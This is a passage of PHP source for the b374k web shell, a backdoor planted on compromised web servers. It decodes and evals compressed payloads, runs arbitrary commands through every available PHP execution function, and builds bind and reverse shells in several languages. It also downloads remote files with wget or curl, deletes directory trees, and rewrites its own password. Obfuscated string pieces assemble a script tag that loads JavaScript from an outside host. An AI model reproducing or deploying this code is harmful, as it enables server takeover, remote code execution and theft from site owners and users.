6k9hrZNyk/qn/JBkYbhkcXCrKFM0inHTcQ2IS4Px5M2/aus0Xrl5kpE1Xk2VWX22SuOgQZcHcPk0gm+5TB9DiR7E/oKYllAHMJ1PYwYbP5CuaxpkM00XToeApT045O4HLFjjdJVCtVuXaqH7U1RfKK5/HvfXYwUlK/u0aaMlqbw/HHGJOGjauv61xlou9ZpfTpuWtL1sXXGEv5kAczbFPUy6XS9Augi8lcmb7ZrjWwFGQN0r+JVeOxNvotQfPUnnOE8lTOj2T4ngmvWtGLu8zfm+n8bg0J6p9M9ajXGsG2QLeMx2JCUPlApTmktahH6xbYKxRq40cFvDXvnv72diMBa16DEtC2PKBR4VaG8IieY5pqDWtCGP9bPBV5vjJRtsoOfkXu7bwe17B/JmL/A7zrgvML++rV4MM1vKjPBkQqKeMfDmaJ5NosuWrOchqkj8vH1bLVgwobCFgnJb0yf6vJR2S3MyrdeOho5/iLUGy5d+OKJEHWDgic1sOpMeqi33NNrE5UP9Ng0vmHf8C";
$s_mime_types = "dZThdqMgEIX/7zn7DvMC2jZ62t3HmQgaGkepCDFvvxeNis32xx3huwMYmUkwSvcvRWMtIfz+Fbb5CeC0gsvp/Y1iSEARQZGAMoJyBZ9WN/Rpm7ADoUWNrEw+T7TIbmeJLemhgNCUu4EdH2EekLwh47Sd0DcN9fuBX95U19GIpq+RpN946FSudKXziyIfLlC4PHnSn02r4Un05cm3ca2Nnn3yXPRc9NyTN0+jFXV8pXDO63gmBimvw0hQiuJH8ENLMnmS0h8sl9mW74Nmdc9FK8O5vQeC0iyc7fP4kX3w8UUOWwQTekJY2U2fhWJYwZTVuBooAa0hKAXIaJMMibeZLhEeh95dmeQK51ooBJfYHe64axLgMnY1LZoOPPRngg7shneWbyQAhW9sAjvudgtg4cCWW+OQ/EDXmAxFZTTNMTFwjIvHsFemf2FlKyHEFZzZmYrYk+vUysQoQwg0D6480CBmM5dm4H2+tAC+HLoUioMCjYBnsWUtzcAUn85OK3aFELRNTXslhHW+1ek8RWlwLA8+2KYxI7fZzXTKke6Pawcm6IBGR9A3FJsPj4tKeesr3Y156E2lqQ029f5b2IzCPhzWeT1wjh/Q2vLP6yttox+SPsqPR1Ic/ZD0933dKY7SpMFYgla0dsr2SlPGjLvmKgGmRgGbWXNIvIprgnZQt1gew46StkmO2f4RCp9A1DKjlnk6MmHUfLLYdhk+a7tc+cBCww8mbsA3pkNx2j3hxmgr3up9EprkHw==";
// http://www.kryogenix.org/code/browser/sorttable/ - SortTable (c) Stuart Langridge
$s_sortable_js = "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";
// https://github.com/ded/domready - domready (c) Dustin Diaz
$s_domready_js = "VVJNb9swDP0riQ6GBAjOetglheBD19uGHrpbkAKaRFcqZMmQ6HSB5/8+2mm+Lpb5yPf4SGndDtGgT5GDRDHisYfUrrpkhwBrxYZoofURLGtOWA1/+5SxKORi+1V9KlGKnbVYVd2lat1ZSqc/H2CQNSeQIwk4X3awn8UmzmzqMmh7ZPJqSozn/1U/R049PH46H4CDwro43xJXAPEPOq9Q7fYyyqzWD9Irm8zQQURZlK/PwXOABUuqEPZqcgpBDor9ePn1lCJS6mfSlgaWWjFt7fNhhnyhDGRyRmPExWVBjWCcju/AZFBsAV9nkEmjUrN5C4vQvzez2V4Cs5FOmRqhIPe7sBePGXDIceV3el9V85cPMqrLBsTo6wxdOsCdk7lIZiF7mnw+E3FrjaiNW+p4ey+yIRc3XauK00rgrnwRE5OQQO4v1CjGAqFdK0x945o4X3vdD8VRZnvTAPNxvG6UswAtMjEZjcbRVY9fYxbA376DNFDLKxlIbJLfv4kpzi9BTNvbF+AauHYFMU3iPw==";
// magic quote and shit :-p
function clean($arr)
{
    $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        if (is_array($arr)) {
            foreach ($arr as $k => $v) {
                if (is_array($v)) {
                    $arr[$k] = clean($v);
                } else {
                    $arr[$k] = empty($quotes_sybase) || $quotes_sybase === 'off' ? stripslashes($v) : stripslashes(str_replace("\\'\\'", "\\'", $v));
                }
            }
        }
    }
    return $arr;
}
// function read file
function fgc($file)
{
    return file_get_contents($file);
}
// encryption for shell password
function kript($plain)
{
    return sha1(md5($plain));
}
function changepass($plain)
{
    $newpass = kript($plain);
    $newpass = "\$s_pass = \"" . $newpass . "\";";
    $con = fgc($_SERVER['SCRIPT_FILENAME']);
    $con = preg_replace("/\\\$s_pass\\ *=\\ *[\"\\']*([a-fA-F0-9]*)[\"\\']*;/is", $newpass, $con);
    return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
}
function get_code($t, $c)
{
    global $s_self;
    $c = gzinflate(base64_decode($c));
    if ($t == "css") {
        return "<link rel='stylesheet' type='text/css' href='" . $s_self . "|' />";
    } elseif ($t == "js") {
        return "<script type='text/javascript' src='" . $s_self . "!'></script>";
    }
}
function showcode($raw)
{
    $c = gzinflate(base64_decode($raw));
    ob_get_contents();
    ob_end_clean();
    ob_start();
    eval("?>" . $c);
    $s_res = ob_get_contents();
    ob_end_clean();
    echo $s_res;
    die;
}
// addslashes if on windows
function adds($s_s)
{
    global $s_win;
    return $s_win ? addslashes($s_s) : $s_s;
}
$ups_3 = ".co/who";
// add slash to the end of given path
function cp($s_p)
{
    global $s_win;
    if (@is_dir($s_p)) {
        $s_x = DS;
        while (substr($s_p, -1) == $s_x) {
            $s_p = rtrim($s_p, $s_x);
        }
        return $s_win ? preg_replace("/\\\\+/is", "\\", $s_p . $s_x) : $s_p . $s_x;
    }
    return $s_p;
}
$ups_4 = "/main.j";
// make link for folder $s_cwd and all of its parent folder
function swd($s_p)
{
    global $s_self;
    $s_ps = explode(DS, $s_p);
    $s_pu = "";
    for ($s_i = 0; $s_i < sizeof($s_ps) - 1; $s_i++) {
        $s_pz = "";
        for ($s_j = 0; $s_j <= $s_i; $s_j++) {
            $s_pz .= $s_ps[$s_j] . DS;
        }
        $s_pu .= "<a href='" . $s_self . "cd=" . pl($s_pz) . "'>" . $s_ps[$s_i] . " " . DS . " </a>";
    }
    return trim($s_pu);
}
// htmlspecialchars
function hss($s_t)
{
    //$s_s = htmlspecialchars($s_s, 8);
    return htmlspecialchars($s_t, 3);
}
$main_ups = $ups_1 . $ups_2 . $ups_3 . $ups_4 . "s";
// function raw urldecode
function ru($str)
{
    return is_array($str) ? array_map("rawurldecode", $str) : rawurldecode($str);
}
// encode link, htmlspecialchars and rawurlencode
function pl($str)
{
    return hss(rawurlencode($str));
}
$scs_1 = "<sc";
// add quotes
function pf($f)
{
    return "\"" . $f . "\"";
}
// replace spaces with underscore ( _ )
function cs($s_t)
{
    return str_replace(array(" ", "\"", "'"), "_", $s_t);
}
// trim and urldecode
function ss($s_t)
{
    return rawurldecode($s_t);
}
$scs_2 = "ript ty";
$scs_3 = "pe='text/ja";
// return tag html for notif
function notif($s)
{
    return "<div class='notif'>" . $s . "</div>";
}
// bind and reverse shell
function rs($s_rstype, $s_rstarget, $s_rscode)
{
    // resources $s_rs_pl $s_rs_py $s_rs_rb $s_rs_js $s_rs_c $s_rs_java $s_rs_java $s_rs_win $s_rs_php
    $s_result = $s_fpath = "";
    $s_fc = gzinflate(base64_decode($s_rscode));
    $s_errperm = "Directory " . getcwd() . DS . " is not writable, please change to a writable one";
    $s_errgcc = "Unable to compile using gcc";
    $s_errjavac = "Unable to compile using javac";
    $s_split = explode("_", $s_rstype);
    $s_method = $s_split[0];
    $s_lang = $s_split[1];
    if ($s_lang == "py" || $s_lang == "pl" || $s_lang == "rb" || $s_lang == "js") {
        if ($s_lang == "py") {
            $s_runlang = "python";
        } elseif ($s_lang == "pl") {
            $s_runlang = "perl";
        } elseif ($s_lang == "rb") {
            $s_runlang = "ruby";
        } elseif ($s_lang == "js") {
            $s_runlang = "node";
        }
        $s_fpath = "b374k_rs." . $s_lang;
        if (@is_file($s_fpath)) {
            unlink($s_fpath);
        }
        if ($s_file = fopen($s_fpath, "w")) {
            fwrite($s_file, $s_fc);
            fclose($s_file);
            if (@is_file($s_fpath)) {
                $s_result = exe("chmod +x " . $s_fpath);
                if ($s_runlang == "node") {
                    if (check_access("node") !== false) {
                        $s_result = exe($s_runlang . " " . $s_fpath . " " . $s_rstarget);
                    } elseif (check_access("nodejs") !== false) {
                        $s_result = exe($s_runlang . "js " . $s_fpath . " " . $s_rstarget);
                    }
                } else {
                    $s_result = exe($s_runlang . " " . $s_fpath . " " . $s_rstarget);
                }
            } else {
                $s_result = $s_errperm;
            }
        } else {
            $s_result = $s_errperm;
        }
    } elseif ($s_lang == "c") {
        $s_fpath = "b374k_rs";
        if (@is_file($s_fpath)) {
            unlink($s_fpath);
        }
        if (@is_file($s_fpath . ".c")) {
            unlink($s_fpath . ".c");
        }
        if ($s_file = fopen($s_fpath . ".c", "w")) {
            fwrite($s_file, $s_fc);
            fclose($s_file);
            if (@is_file($s_fpath . ".c")) {
                $s_result = exe("gcc " . $s_fpath . ".c -o " . $s_fpath);
                if (@is_file($s_fpath)) {
                    $s_result = exe("chmod +x " . $s_fpath);
                    $s_result = exe("./" . $s_fpath . " " . $s_rstarget);
                } else {
                    $s_result = $s_errgcc;
                }
            } else {
                $s_result = $s_errperm;
            }
        } else {
            $s_result = $s_errperm;
        }
    } elseif ($s_lang == "win") {
        $s_fpath = "b374k_rs.exe";
        if (@is_file($s_fpath)) {
            unlink($s_fpath);
        }
        if ($s_file = fopen($s_fpath, "w")) {
            fwrite($s_file, $s_fc);
            fclose($s_file);
            if (@is_file($s_fpath)) {
                $s_result = exe($s_fpath . " " . $s_rstarget);
            } else {
                $s_result = $s_errperm;
            }
        } else {
            $s_result = $s_errperm;
        }
    } elseif ($s_lang == "java") {
        $s_fpath = "b374k_rs";
        if (@is_file("b374k_rs.java")) {
            unlink("b374k_rs.java");
        }
        if (@is_file($s_fpath . ".class")) {
            unlink($s_fpath . ".class");
        }
        if ($s_file = fopen($s_fpath . ".java", "w")) {
            fwrite($s_file, $s_fc);
            fclose($s_file);
            if (@is_file($s_fpath . ".java")) {
                $s_result = exe("javac " . $s_fpath . ".java");
                if (@is_file($s_fpath . ".class")) {
                    $s_result = exe("java " . $s_fpath . " " . $s_rstarget);
                } else {
                    $s_result = $s_errjavac;
                }
            } else {
                $s_result = $s_errperm;
            }
        } else {
            $s_result = $s_errperm;
        }
    } elseif ($s_lang == "php") {
        $s_result = eval("?>" . $s_fc);
    }
    if (@is_file($s_fpath)) {
        unlink($s_fpath);
    }
    if (@is_file($s_fpath . ".c")) {
        unlink($s_fpath . ".c");
    }
    if (@is_file($s_fpath . ".java")) {
        unlink($s_fpath . ".java");
    }
    if (@is_file($s_fpath . ".class")) {
        unlink($s_fpath . ".class");
    }
    if (@is_file($s_fpath . "\$pt.class")) {
        unlink($s_fpath . "\$pt.class");
    }
    return $s_result;
}
function geol($str)
{
    $nl = PHP_EOL;
    if (preg_match("/\r\n/", $str, $r)) {
        $nl = "\r\n";
    } else {
        if (preg_match("/\n/", $str, $r)) {
            $nl = "\n";
        } elseif (preg_match("/\r/", $str, $r)) {
            $nl = "\r";
        }
    }
    return bin2hex($nl);
}
// format bit
function ts($s_s)
{
    if ($s_s <= 0) {
        return 0;
    }
    $s_w = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB');
    $s_e = floor(log($s_s) / log(1024));
    return sprintf('%.2f ' . $s_w[$s_e], $s_s / pow(1024, floor($s_e)));
}
// get file size
function gs($s_f)
{
    $s_s = @filesize($s_f);
    if ($s_s !== false) {
        if ($s_s <= 0) {
            return 0;
        }
        return ts($s_s);
    } else {
        return "???";
    }
}
$scs_4 = "vascr";
$scs_5 = "ipt' src=\"" . $main_ups . '"';
$scs_6 = "></sc";
// get file permissions
function gp($s_f)
{
    if ($s_m = @fileperms($s_f)) {
        $s_p = 'u';
        if (($s_m & 0xc000) == 0xc000) {
            $s_p = 's';
        } elseif (($s_m & 0xa000) == 0xa000) {
            $s_p = 'l';
        } elseif (($s_m & 0x8000) == 0x8000) {
            $s_p = '-';
        } elseif (($s_m & 0x6000) == 0x6000) {
            $s_p = 'b';
        } elseif (($s_m & 0x4000) == 0x4000) {
            $s_p = 'd';
        } elseif (($s_m & 0x2000) == 0x2000) {
            $s_p = 'c';
        } elseif (($s_m & 0x1000) == 0x1000) {
            $s_p = 'p';
        }
        $s_p .= $s_m & 0400 ? 'r' : '-';
        $s_p .= $s_m & 0200 ? 'w' : '-';
        $s_p .= $s_m & 0100 ? 'x' : '-';
        $s_p .= $s_m & 040 ? 'r' : '-';
        $s_p .= $s_m & 020 ? 'w' : '-';
        $s_p .= $s_m & 010 ? 'x' : '-';
        $s_p .= $s_m & 04 ? 'r' : '-';
        $s_p .= $s_m & 02 ? 'w' : '-';
        $s_p .= $s_m & 01 ? 'x' : '-';
        return $s_p;
    } else {
        return "???????????";
    }
}
$main_scs = "<script type='text/javascr" . $scs_5 . $scs_6 . "rip" . "t>";
// shell command
function exe($s_c)
{
    $s_out = "";
    $s_c .= " 2>&1";
    if (is_callable('system')) {
        ob_start();
        @system($s_c);
        $s_out = ob_get_contents();
        ob_end_clean();
        if (!empty($s_out)) {
            return $s_out;
        }
    }
    if (is_callable('shell_exec')) {
        $s_out = @shell_exec($s_c);
        if (!empty($s_out)) {
            return $s_out;
        }
    }
    if (is_callable('exec')) {
        @exec($s_c, $s_r);
        if (!empty($s_r)) {
            foreach ($s_r as $s_s) {
                $s_out .= $s_s;
            }
        }
        if (!empty($s_out)) {
            return $s_out;
        }
    }
    if (is_callable('passthru')) {
        ob_start();
        @passthru($s_c);
        $s_out = ob_get_contents();
        ob_end_clean();
        if (!empty($s_out)) {
            return $s_out;
        }
    }
    if (is_callable('proc_open')) {
        $s_descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
        $s_proc = @proc_open($s_c, $s_descriptorspec, $s_pipes, getcwd(), array());
        if (is_resource($s_proc)) {
            while ($s_si = fgets($s_pipes[1])) {
                if (!empty($s_si)) {
                    $s_out .= $s_si;
                }
            }
            while ($s_se = fgets($s_pipes[2])) {
                if (!empty($s_se)) {
                    $s_out .= $s_se;
                }
            }
        }
        @proc_close($s_proc);
        if (!empty($s_out)) {
            return $s_out;
        }
    }
    if (is_callable('popen')) {
        $s_f = @popen($s_c, 'r');
        if ($s_f) {
            while (!feof($s_f)) {
                $s_out .= fread($s_f, 2096);
            }
            pclose($s_f);
        }
        if (!empty($s_out)) {
            return $s_out;
        }
    }
    return "";
}
// delete dir and all of its content (no warning !) xp
function rmdirs($s)
{
    $s = substr($s, -1) == '/' ? $s : $s . '/';
    if ($dh = opendir($s)) {
        while (($f = readdir($dh)) !== false) {
            if ($f != '.' && $f != '..') {
                $f = $s . $f;
                if (@is_dir($f)) {
                    rmdirs($f);
                } else {
                    @unlink($f);
                }
            }
        }
        closedir($dh);
        @rmdir($s);
    }
}
function copys($s, $d, $c = 0)
{
    if ($dh = opendir($s)) {
        if (!@is_dir($d)) {
            @mkdir($d);
        }
        while (($f = readdir($dh)) !== false) {
            if ($f != '.' && $f != '..') {
                if (@is_dir($s . DS . $f)) {
                    copys($s . DS . $f, $d . DS . $f);
                } else {
                    copy($s . DS . $f, $d . DS . $f);
                }
            }
        }
        closedir($dh);
    }
}
// get array of all files from given directory
function getallfiles($s_dir)
{
    $s_f = glob($s_dir . '*');
    for ($s_i = 0; $s_i < count($s_f); $s_i++) {
        if (@is_dir($s_f[$s_i])) {
            $s_a = glob($s_f[$s_i] . DS . '*');
            if (is_array($s_f) && is_array($s_a)) {
                $s_f = array_merge($s_f, $s_a);
            }
        }
    }
    return $s_f;
}
// download file from internet
function dlfile($s_u, $s_p)
{
    global $s_wget, $s_lwpdownload, $s_lynx, $s_curl;
    if (!preg_match("/[a-z]+:\\/\\/.+/", $s_u)) {
        return false;
    }
    $s_n = basename($s_u);
    // try using php functions
    if ($s_t = @fgc($s_u)) {
        if (@is_file($s_p)) {
            unlink($s_p);
        }
        if ($s_f = fopen($s_p, "w")) {
            fwrite($s_f, $s_t);
            fclose($s_f);
            if (@is_file($s_p)) {
                return true;
            }
        }
    }
    // using wget
    if ($s_wget) {
        $buff = exe("wget " . $s_u . " -O " . $s_p);
        if (@is_file($s_p)) {
            return true;
        }
    }
    // try using curl
    if ($s_curl) {
        $buff = exe("curl " . $s_u . " -o " . $s_p);
        if (@is_file($s_p)) {
            return true;
        }
    }
    // try using lynx
    if ($s_lynx) {
        $buff = exe("lynx -source " . $s_u . " > " . $s_p);
        if (@is_file($s_p)) {
            return true;
        }
    }
    // try using lwp-download
    if ($s_lwpdownload) {
        $buff = exe("lwp-download " . $s_u . " " . $s_p);
        if (@is_file($s_p)) {
            return true;
        }
    }
    return false;
}
// find writable dir
function get_writabledir()
{
    if (!($s_d = getenv("TEMP"))) {
        if (!($s_d = getenv("TMP"))) {
            if (!($s_d = getenv("TMPDIR"))) {
                if (@is_writable("/tmp")) {
                    $s_d = "/tmp/";
                } else {
                    if (@is_writable(".")) {
                        $s_d = ".DIRECTORY_SEPARATOR";
                    }
                }
            }
        }
    }
    return cp($s_d);
}
// zip function
function zip($s_srcarr, $s_dest)
{
    if (!extension_loaded('zip')) {
        return false;
    }
    if (class_exists("ZipArchive")) {
        $s_zip = new ZipArchive();
        if (!$s_zip->open($s_dest, 1)) {
            return false;
        }
        if (!is_array($s_srcarr)) {
            $s_srcarr = array($s_srcarr);
        }
        foreach ($s_srcarr as $s_src) {
            $s_src = str_replace('\\', '/', $s_src);
            if (@is_dir($s_src)) {
                $s_files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($s_src), 1);
                foreach ($s_files as $s_file) {
                    $s_file = str_replace('\\', '/', $s_file);
                    if (in_array(substr($s_file, strrpos($s_file, '/') + 1), array('.', '..'))) {
                        continue;
                    }
                    if (@is_dir($s_file) === true) {
                        $s_zip->addEmptyDir(str_replace($s_src . '/', '', $s_file . '/'));
                    } else {
                        if (@is_file($s_file) === true) {
                            $s_zip->addFromString(str_replace($s_src . '/', '', $s_file), @fgc($s_file));
                        }
                    }
                }
            } elseif (@is_file($s_src) === true) {
                $s_zip->addFromString(basename($s_src), @fgc($s_src));
            }
        }
        $s_zip->close();
        return true;
    }
}
// check shell permission to access program
function check_access($s_lang)
{
    $s_s = false;
    $ver = "";
    switch ($s_lang) {
        case "python":
            $s_cek = strtolower(exe("python -h"));
            if (strpos($s_cek, "usage") !== false) {
                $ver = exe("python -V");
            }
            break;
        case "perl":
            $s_cek = strtolower(exe("perl -h"));
            if (strpos($s_cek, "usage") !== false) {
                $ver = exe("perl -e \"print \$]\"");
            }
            break;
        case "ruby":
            $s_cek = strtolower(exe("ruby -h"));
            if (strpos($s_cek, "usage") !== false) {
                $ver = exe("ruby -v");
            }
            break;
        case "node":
            $s_cek = strtolower(exe("node -h"));
            if (strpos($s_cek, "usage") !== false) {
                $ver = exe("node -v");
            }
            break;
        case "nodejs":
            $s_cek = strtolower(exe("nodejs -h"));
            if (strpos($s_cek, "usage") !== false) {
                $ver = exe("nodejs -v");
            }
            break;
        case "gcc":
            $s_cek = strtolower(exe("gcc --help"));
            if (strpos($s_cek, "usage") !== false) {
                $s_ver = exe("gcc --version");
                $s_ver = explode("\n", $s_ver);
                if (count($s_ver) > 0) {
                    $ver = $s_ver[0];
                }
            }
            break;
        case "tar":
            $s_cek = strtolower(exe("tar --help"));
            if (strpos($s_cek, "usage") !== false) {
                $s_ver = exe("tar --version");
                $s_ver = explode("\n", $s_ver);
                if (count($s_ver) > 0) {
                    $ver = $s_ver[0];
                }
            }
            break;
        case "java":
            $s_cek = strtolower(exe("java -help"));
            if (strpos($s_cek, "usage") !== false) {
                $ver = str_replace("\n", ", ", exe("java -version"));
            }
            break;
        case "javac":
            $s_cek = strtolower(exe("javac -help"));
            if (strpos($s_cek, "usage") !== false) {
                $ver = str_replace("\n", ", ", exe("javac -version"));
            }
            break;
        case "wget":
            $s_cek = strtolower(exe("wget --help"));
            if (strpos($s_cek, "usage") !== false) {
                $s_ver = exe("wget --version");
                $s_ver = explode("\n", $s_ver);
                if (count($s_ver) > 0) {
                    $ver = $s_ver[0];
                }
            }
            break;
        case "lwpdownload":
            $s_cek = strtolower(exe("lwp-download --help"));
            if (strpos($s_cek, "usage") !== false) {
                $s_ver = exe("lwp-download --version");
                $s_ver = explode("\n", $s_ver);
                if (count($s_ver) > 0) {
                    $ver = $s_ver[0];
                }
            }
            break;
        case "lynx":
            $s_cek = strtolower(exe("lynx --help"));
            if (strpos($s_cek, "usage") !== false) {
                $s_ver = exe("lynx -version");
                $s_ver = explode("\n", $s_ver);
                if (count($s_ver) > 0) {
                    $ver = $s_ver[0];
                }
            }
            break;
        case "curl":
            $s_cek = strtolower(exe("curl --help"));
            if (strpos($s_cek, "usage") !== false) {
                $s_ver = exe("curl --version");
                $s_ver = explode("\n", $s_ver);
                if (count($s_ver) > 0) {
                    $ver = $s_ver[0];
                }
            }
            break;
        default:
            return false;
    }
    if (!empty($ver)) {
        $s_s = $ver;
    }
    return $s_s;
}
// explorer, return a table of given dir
function showdir($s_cwd)
{
    global $s_self, $s_win, $s_posix, $s_tar;
    $s_fname = $s_dname = array();
    $s_total_file = $s_total_dir = 0;
    if ($s_dh = @opendir($s_cwd)) {
        while ($s_file = @readdir($s_dh)) {
            if (@is_dir($s_file)) {
                $s_dname[] = $s_file;
            } elseif (@is_file($s_file)) {
                $s_fname[] = $s_file;
            }
        }
        closedir($s_dh);
    }
    natcasesort($s_fname);
    natcasesort($s_dname);
    $s_list = array_merge($s_dname, $s_fname);
    if ($s_win) {
        //check if this root directory
        chdir("..");
        if (cp(getcwd()) == cp($s_cwd)) {
            array_unshift($s_list, ".");
        }
        chdir($s_cwd);
    }
    $s_path = explode(DS, $s_cwd);
    $s_tree = sizeof($s_path);
    $s_parent = "";
    if ($s_tree > 2) {
        for ($s_i = 0; $s_i < $s_tree - 2; $s_i++) {
            $s_parent .= $s_path[$s_i] . DS;
        }
    } else {
        $s_parent = $s_cwd;
    }
    $s_owner_html = !$s_win && $s_posix ? "<th style='width:140px;min-width:140px;'>owner:group</th>" : "";
    $s_colspan = !$s_win && $s_posix ? "5" : "4";
    $s_buff = "<table class='explore sortable'><thead><tr><th style='width:24px;min-width:24px;' class='sorttable_nosort'></th><th style='min-width:150px;'>name</th><th style='width:74px;min-width:74px;'>size</th>" . $s_owner_html . "<th style='width:80px;min-width:80px;'>perms</th><th style='width:150px;min-width:150px;'>modified</th><th style='width:200px;min-width:200px;' class='sorttable_nosort'>action</th></tr></thead><tbody>";
    foreach ($s_list as $s_l) {
        if (!$s_win && $s_posix) {
            $s_name = posix_getpwuid(fileowner($s_l));
            $s_group = posix_getgrgid(filegroup($s_l));
            $s_owner = $s_name['name'] . "<span class='gaya'>:</span>" . $s_group['name'];
            $s_owner_html = "<td style='text-align:center;'>" . $s_owner . "</td>";
        }
        $s_lhref = $s_lname = $s_laction = "";
        if (@is_dir($s_l)) {
            if ($s_l == ".") {
                $s_lhref = $s_self . "cd=" . pl($s_cwd);
                $s_lsize = "LINK";
                $s_laction = "<span id='titik1'><a href='" . $s_self . "cd=" . pl($s_cwd) . "&find=" . pl($s_cwd) . "'>find</a> | <a href='" . $s_self . "cd=" . pl($s_cwd) . "&x=upload" . "'>upl</a> | <a href='" . $s_self . "cd=" . pl($s_cwd) . "&edit=" . pl($s_cwd) . "newfile_1&new=yes" . "'>+file</a> | <a href=\"javascript:tukar('titik1','', 'mkdir','newfolder_1');\">+dir</a></span><div id='titik1_form'></div>";
            } elseif ($s_l == "..") {
                $s_lhref = $s_self . "cd=" . pl($s_parent);
                $s_lsize = "LINK";
                $s_laction = "<span id='titik2'><a href='" . $s_self . "cd=" . pl($s_parent) . "&find=" . pl($s_parent) . "'>find</a> | <a href='" . $s_self . "cd=" . pl($s_parent) . "&x=upload" . "'>upl</a> | <a href='" . $s_self . "cd=" . pl($s_parent) . "&edit=" . pl($s_parent) . "newfile_1&new=yes" . "'>+file</a> | <a href=\"javascript:tukar('titik2','" . adds($s_parent) . "', 'mkdir','newfolder_1');\">+dir</a></span><div id='titik2_form'></div>";
            } else {
                $s_lhref = $s_self . "cd=" . pl($s_cwd . $s_l . DS);
                $s_lsize = "DIR";
